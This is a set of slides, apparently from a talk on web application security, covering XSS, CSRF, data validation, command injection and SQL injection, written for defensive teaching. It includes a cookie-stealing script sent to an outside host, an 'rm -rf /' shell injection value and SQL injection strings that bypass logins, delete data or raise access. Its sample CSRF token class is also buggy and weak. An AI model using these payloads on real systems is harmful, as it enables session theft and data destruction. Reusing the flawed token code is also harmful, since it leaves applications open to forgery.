Welcome

Web Application Security

MIT Security Camp


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http://www.clambert.org/talks/
Who am I?

A bit about me

- Computer Science student at Northeastern University
- Founder of White Crown Networks, a small internet application security firm
- Have consulted for PayPal, Vivendi Universal, Infogrames USA, & vBulletin
- First time speaker
Why this talk?

Why web security?

- More and more of what we do is done on the web:
- Grade management, scheduling, communication, administration, support
- Web security is growing in importance, but still largely ignored in favor of traditional models
- Often the weakest link into your network
Coverage

What this talk is not about

- Exploits involving auxiliary client technologies: ActiveX, Java, Flash, Javascript
- Vulnerable web servers or their child applications: Apache, thttpd, PHP, Perl, ASP

What this talk is about

- Problems with stateless HTTP client/server trust
- Cross Site Scripting & Client Side Request Forgeries
- Coding guidelines for working with the web
XSS Intro

Cross Site Scripting (XSS)

- Attackers exploit weaknesses in web applications to push client side code to other users
- When code is received from the server, browsers trust it as they do legitimate code
- Two classifications: stored and proxied
XSS: How It Works

- Applications are vulnerable when users can directly modify output of a page
- If unfiltered, JavaScript can be used to execute arbitrary code or, steal cookies

```html
<script>
    document.location="http://clambert.org/steal?" +
    document.cookie;
</script>
```
Stored vs. Proxied

**XSS: Stored Exploit**

- Examples: message boards, guestbooks, weblogs
- User input is anticipated, more obvious to prevent
- Submitted data should be, and often is, filtered to remove HTML

**XSS: Proxied Exploit**

- Examples: error messages, webmail, debugging pages
- Since user input mostly comes unexpected, can be difficult to recognize
- Any foreign data should be filtered to reduce risk
**XSS Stored Example**

**Guestbook**

- POST /guestbook/ (Malicious Code)

Guestbook tainted with Malicious Code

-> GET /guestbook/ ->

Innocent Client browser trusts content associated with Innocent Server

Malicious code trusted and executed by Innocent Client browser

-> Code executes and sends cookies to Malicious Server ->
### XSS Proxying Example

#### Error Page Redirect

<table>
<thead>
<tr>
<th>Innocent Client browser trusts content associated with Innocent Server</th>
</tr>
</thead>
<tbody>
<tr>
<td>Code trusted and executed by Innocent Client browser</td>
</tr>
</tbody>
</table>

- GET /SomeRandomWebpage/ →
- HTTP redirect to your server ←
- GET /404/</script> →
- Sorry, /404/<script src="..."></script> ←
<table>
<thead>
<tr>
<th>![Computer Icon]</th>
<th>Code executes and sends cookies to Malicious Server</th>
<th>![Server Icon]</th>
</tr>
</thead>
</table>


Simple Solution

XSS: The Solution

- Luckily, XSS has a fairly simple solution
- Do not allow unfiltered user data to be displayed to end users, even to themselves
- Remove HTML entirely or translate entities (< and > to &lt; and &gt;)
- Suggested to filter all data except what you need, rather than allowing all data except what you don’t
CSRF Intro

Client Side Request Forgeries (CSRF)

- Traditional authentication model: Users login, and all further requests from them are authorized
- Attackers force a user into submitting a request without their consent or knowledge
- So requests sent through the authenticated user are also treated as valid
CSRF Description

CSRF: How It Works

The SRC attribute of an `<img>` tag is requested by the browser on page load. The server doesn’t know you want an image, and the browser doesn’t know it’s not getting one.

```html
<img src="http://google.com/search?q=CSRF"/>
```

Forces the user to request a Google search without their consent. Now, for something more interesting.
CSRF Example

Auction Server

- GET /listing/1643972/

HTML with `<img src="/bid?listing=1643972&amount=100"/>

- GET /bid?listing=1643972&amount=100

Innocent Client is already authenticated with the server

- Thank you for placing a bid.
CSRF Solutions

**CSRF: How to stop it**

- Force HTTP POST over GET?
- Verify referrers?
- Token based system to verify intent
Token Based Solution

Normal web form

```html
<form action="bid.cgi" method="POST">
<input type="text" name="price"/>
<input type="submit"/>
</form>
```

Token based form

```html
<form action="bid.cgi" method="POST">
<input type="hidden" name="token" value="<?=$csrf->getToken()?>"/>
<input type="text" name="price"/>
<input type="submit"/>
</form>
```

Token based validation

```php
<?
if ($csrf->checkToken($_REQUEST['token'])) {
    placeBid($_REQUEST['price']);
}
?>
```

Example Source
<?php

class CSRF {
    var $salt;
    var $id;
    function CSRF($salt, $id) {
        $this->salt = $salt;
        $this->id = $id;
    }

    function getToken() {
        return md5($this->salt . $this->id);
    }

    function checkToken($token) {
        return ($token == getToken());
    }
}

$csrf = new CSRF("camp salt", $REMOTE_ADDR);

Alternative

For additional security, you can grant one time, one use tokens by keeping a record of them in a data store. This increases the level of security, as a user will receive a different token for each action they perform.
Best Practices

- Verify Data Integrity
- Data Tampering
- Command Injection
- SQL Injection
- Need To Know
Data Integrity

Helps prevent against XSS

Check data types:

```php
<?
if (is_int($age)) { ... }
?>
```

Check allowed values:

```php
<?
if (in_array(strtoupper($state),
array("RI", "MA", "CT", "VT", "NH", "ME"))) {
    ...
}
?>
```

Filter unexpected HTML

```php
<?
$firstname = strip_tags($_GET[firstname]);
$firstname = htmlentities($_GET[firstname]);
?>
```
Data Tampering

Hash when persisting with cookies or hidden fields

**Bad Cookie**

loggedin=true
user=admin

**Better Cookie**

user=admin
passhash=72e4fb8f76b9782b79a91e549325bc6a

**Bad Field**

<input type="hidden" name="u" value="admin"/>

**Better Field**

<input type="hidden" name="u" value="admin"/>
<input type="hidden" name="salthash" value="72e4fb8f76b9782b79a91e549325bc6a"/>
Command injection

- Look out for ... and a leading / when dealing with the file system
- Use built in language functionality rather than the shell: `move($f1, $f2)` versus `mv $f1 $f2`
- When using the shell, watch out for escapes: `finger $username` ... with $username being "; rm -rf /"
SQL Injection

Escape quotes in user data:

```
SELECT * FROM users WHERE username = '$user' AND password = '$pass';
$user = "' OR '1' = '1"
```

Multiple queries:

```
SELECT * FROM dates WHERE day = '$today';
$today = "2003-06-09"; DELETE FROM dates;
```

Modified Insertion:

```
INSERT INTO user (name, password, access) VALUES ('$name', '$password', '1');
$password = "mypass", 500), ('dummy', 'user"
```
Need To Know

- Use appropriate permissions wherever possible
- Log analyzer needs only to read log files, not write to them
- Database frontend only needs to select pages, not insert them
- Protects critical data from not as critical applications
More Info

Web security resources

- Open Web Application Security Project (http://www.owasp.org)
- Apache XSS Information (http://httpd.apache.org/info/css-security/)
- Original discussion about CSRF (http://www.tux.org/~peterw/csrf.txt)
Thank You

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